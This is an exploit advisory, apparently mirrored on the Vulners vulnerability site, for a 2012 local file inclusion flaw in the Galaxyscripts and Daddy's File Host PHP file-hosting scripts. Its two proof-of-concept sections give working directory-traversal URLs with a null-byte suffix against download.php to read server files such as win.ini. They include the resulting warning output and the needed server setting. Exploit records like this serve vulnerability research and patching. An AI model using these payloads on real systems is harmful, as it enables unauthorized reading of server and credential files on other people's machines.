Vulners
Lucene search
Galaxyscripts / Daddy's File Host Local File Inclusion
`####################################################
### Exploit Title: Galaxyscripts / Daddy's File Host (All Versions) Local File Inclusion Vulnerability
### Date: 09/08/2012
### Author: L0n3ly-H34rT
### Homepage: http://se3c.tk/
### Contact: [email protected]
### Software Link For Galaxyscripts 2.0 Beta : http://rapidshare.com/files/79821189/MFH_v2.0_Beta_webgraf.ru.rar
### Or Download Galaxyscripts 1.5 : http://www.phpkode.com/download/p/Mini_File_Host-1.5.zip
### Software Link For Daddy's : http://www.daddyscripts.com/download.php?file=dfh-v1.2.5.zip
### Tested on: Linux/Windows
### Approve For Galaxyscripts 2.0 Beta : http://upload.traidnt.net/upfiles/Fbq13249.png
### Approve For Galaxyscripts 1.5 : http://upload.traidnt.net/upfiles/ZHN13291.png
### Approve For Daddy's File Host 1.2.4 : http://upload.traidnt.net/upfiles/AT613341.png
####################################################
# Introduction :
This two scripts have same source but galaxyscripts doesn't support anymore in last year ago or may be two ! i don't know!
he put messegae in his homepage of script :
http://www.galaxyscripts.com/
the content of message :
Mini File Host & GalaxyScripts
Hi Guys,
GalaxyScripts.com recently got hacked and I haven't had the time to patch everything up. I'm wrapping up some other projects. I have a new version of MiniFilehost in the making, its completely being re-built from scratch, but it will be backwards compatible with your old files and configuration. The new version will use the Smarty Templating system so that new skins or templates can be easily made and modified. This seperates the application layer from the presentation layer. In the meantime if you need a script for hosting files, you can use daddyscripts( http://www.daddyscripts.com/ ). -Steven Johal ( http://www.stevenjohal.com/ )
# P.O.C (1) For Daddy's File Host:
- First, sign up & in as user in Daddy's File Host to bypass some ads & get that work ..
- Then put that in url e.g. :
http://127.0.0.1/dfh/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg
- You see first line of file in warning e.g. :
Warning: filesize() [function.filesize]: stat failed for ./storage/; for 16-bit app support in C:\AppServ\www\dfh\download.php on line 164
----------------------------------------------------
# P.O.C (2) For Galaxyscripts :
- Just apply that in url e.g. :
http://127.0.0.1/MFH/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg
- You see first line of file in warning e.g. :
Warning: filesize() [function.filesize]: stat failed for ./storage/; for 16-bit app support in C:\AppServ\www\MFH\download.php on line 142
# Note :
Must Be magic_quotes_gpc = Off
# Greetz to my friendz
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Aug 2012 00:00Current